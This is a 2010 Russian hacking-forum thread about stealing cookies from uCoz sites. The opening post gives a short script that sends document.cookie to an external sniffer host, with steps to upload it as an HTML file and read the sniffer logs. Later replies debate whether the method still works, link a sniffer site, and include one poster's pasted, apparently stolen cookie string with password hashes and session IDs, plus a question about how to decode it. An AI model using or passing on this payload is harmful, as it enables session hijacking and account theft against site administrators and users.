Форумы А вот и долгожданный Ucoz

Discussion in 'Уязвимости CMS/форумов' started by Dr..VATSON, 18 Mar 2010.

  1. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    52
    Likes Received:
    53
    Reputations:
    18
    Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

    Тырим куки в Ucoz

    1) создаём фйлик html вписываем код который тырит куки
    Code:
    <script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>
    2) Загружаем наш html файлик через "Обзор"

    Смотрим скрин

    4) Должно получиться примерно так когда файлик загружен

    Смотрим скрин

    5) Смотрим логи на сниффере (у меня свой сниффер)

    Смотрим скрин

    Ну вот и всё...
     
    #1 Dr..VATSON, 18 Mar 2010
    Last edited: 18 Mar 2010
    7 people like this.
  2. general.fox

    general.fox Member

    Joined:
    9 Nov 2009
    Messages:
    83
    Likes Received:
    8
    Reputations:
    -1
    На UcoZе куки Админов привязаны к IP.
     
  3. general.fox

    general.fox Member

    Joined:
    9 Nov 2009
    Messages:
    83
    Likes Received:
    8
    Reputations:
    -1
    Хотя может я ошибаюсь...
     
  4. Koder45ru

    Koder45ru New Member

    Joined:
    18 Feb 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Хех где то похожее читал ток там через чат можно админку на укозе утащить..
    а так в целом прикольно за мутил респект..
     
  5. Rejiser

    Rejiser Member

    Joined:
    9 May 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    0
    не подскажешь где читал?)
     
  6. sparrow3000

    sparrow3000 Member

    Joined:
    27 Mar 2009
    Messages:
    378
    Likes Received:
    38
    Reputations:
    0
    если про бесцветный смайлик со скриптом то это не пашет уже :D
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде
     
    1 person likes this.
  8. NeoX

    NeoX Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    65
    Likes Received:
    21
    Reputations:
    5
    еще актуально?
     
    1 person likes this.
  9. niva622

    niva622 New Member

    Joined:
    4 Nov 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    еще актуально, но на некоторых сайтах запрещено добавлять html файлы..
     
  10. <Maxwell>

    <Maxwell> Member

    Joined:
    27 Oct 2009
    Messages:
    0
    Likes Received:
    10
    Reputations:
    1
    Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.
     
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    уже не катит этот вариант ....имхо
     
    _________________________
  12. rinardo

    rinardo New Member

    Joined:
    7 Jul 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Я смог стырить, но как расшифровать и узнал логин?

    itemMarking_forums_items=eJxNzssNAzEIBNCWzHfAW02OW0O0vQfhOM7JmlwnwPOaxPN9T1ZXu-5KCEuzpAqMDPyQBFiI2AjN4EZPHKwLFRC6SYREeg5sB4cuzH4XcvRyXTT-Q_Y16X4QlN-W46D5WCj7d2Vy7coDuySFV-Xr-VwwFJc7jA,,; treemenu=none open; dle_user_id=142; dle_password=d8be0919a798095266621a780e173255; member_id=142; pass_hash=577868b50d1676e9cb3c191a1fe85f6b; PHPSESSID=8112a33d76ac231f8ca1e023a1084019; session_id=b4156144ec733882e1f16ac52eb8c285; forum_session_id=b4156144ec733882e1f16ac52eb8c285; modtids=,
     
  13. Attacking

    Attacking New Member

    Joined:
    29 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Актуально ?